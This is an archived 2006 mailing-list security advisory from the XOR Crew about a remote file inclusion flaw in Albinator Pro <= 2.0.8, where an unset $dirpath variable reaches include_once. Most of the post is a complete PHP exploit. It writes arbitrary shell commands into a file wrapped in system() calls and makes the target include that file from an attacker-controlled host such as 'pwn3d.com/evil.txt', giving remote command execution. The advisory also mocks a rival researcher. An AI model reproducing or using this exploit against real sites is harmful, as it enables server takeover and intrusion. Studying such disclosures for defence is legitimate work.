lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <4459B7DD.6070301@gmail.com>
Date: Thu May  4 09:14:33 2006
From: wr0ck.lists at gmail.com (wr0ck)
Subject: [XPA] - Albinator Pro <= 2.0.8 - Remote Command
	Execution Vulnerability

===========================================================================
XOR Crew :: Security Advisory 0day GIVE AWAY         (date?)   2/20/2006
===========================================================================
Albinator Pro <= 2.0.8 - Remote Command Execution Vulnerability
===========================================================================
http://www.xorcrew.net/                     http://www.xorcrew.net/ReZEN
===========================================================================

:: Summary

       Vendor       :  Albinator
       Vendor Site  :  http://www.dreamcost.com/
       Product(s)   :  Albinator Pro - Photo Album/Gallery Management System
       Version(s)   :  All
       Severity     :  Medium/High
       Impact       :  Remote Command Execution
       Release Date :  2/11/2006
       Credits      :  ReZEN (rezen (a) xorcrew (.) net)

===========================================================================

I. Description

Albinator is developed in PHP, backed by lightning speed database in 
MySql. With its unique features, it instantly and automatically 
organizes your websites' users digital images into compact digital photo 
albums ideal for sharing and emailing to friends and family. It 
automatically generates thumbnails to the photos for easy browsing.


===========================================================================

II. Synopsis (0day give away because r0t is stupid)

THIS BUG WORKS FOR ALL VERSIONS OF ALBINATOR!!!

(r0t you are a moron, stick to useless XSS exploits please thanks)

There is a remote file inclusion vulnerability that allows for remote 
command execution in the /essentials/gc.php and in the 
essentials/integration.inc.php file.  The bug is here on lines 2, and 3:

include_once($dirpath . "essential/config.php");
include_once($dirpath . "essential/config_tables.inc.php");

the $dirpath variable is not set prior to being used in the 
include_once() function. The vendor and support team have been contacted.

===========================================================================

Exploit code:

-----BEGIN-----

<?php
/*
Albinator Remote File Inclusion Exploit c0ded by ReZEN
Sh0uts: xorcrew.net, ajax, gml, #subterrain, D2K
url:  http://www.xorcrew.net/ReZEN

example:
turl: http://www.target.com/path to albinator/essential/gc.php?dirpath=
hurl: http://www.pwn3d.com/evil.txt?

*/

$cmd = $_POST["cmd"];
$turl = $_POST["turl"];
$hurl = $_POST["hurl"];

$form= "<form method=\"post\" action=\"".$PHP_SELF."\">"
     ."turl:<br><input type=\"text\" name=\"turl\" size=\"90\" 
value=\"".$turl."\"><br>"
     ."hurl:<br><input type=\"text\" name=\"hurl\" size=\"90\" 
value=\"".$hurl."\"><br>"
     ."cmd:<br><input type=\"text\" name=\"cmd\" size=\"90\" 
value=\"".$cmd."\"><br>"
     ."<input type=\"submit\" value=\"Submit\" name=\"submit\">"
     ."</form><HR WIDTH=\"650\" ALIGN=\"LEFT\">";

if (!isset($_POST['submit']))
{

echo $form;

}else{

$file = fopen ("test.txt", "w+");

fwrite($file, "<?php system(\"echo ++BEGIN++\"); system(\"".$cmd."\");
system(\"echo ++END++\"); ?>");
fclose($file);

$file = fopen ($turl.$hurl, "r");
if (!$file) {
     echo "<p>Unable to get output.\n";
     exit;
}

echo $form;

while (!feof ($file)) {
     $line .= fgets ($file, 1024)."<br>";
     }
$tpos1 = strpos($line, "++BEGIN++");
$tpos2 = strpos($line, "++END++");
$tpos1 = $tpos1+strlen("++BEGIN++");
$tpos2 = $tpos2-$tpos1;
$output = substr($line, $tpos1, $tpos2);
echo $output;

}
?>


------END------

===========================================================================

IV. Greets :>

All of xor, Infinity, stokhli, ajax, gml, cijfer, D2K.

===========================================================================

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ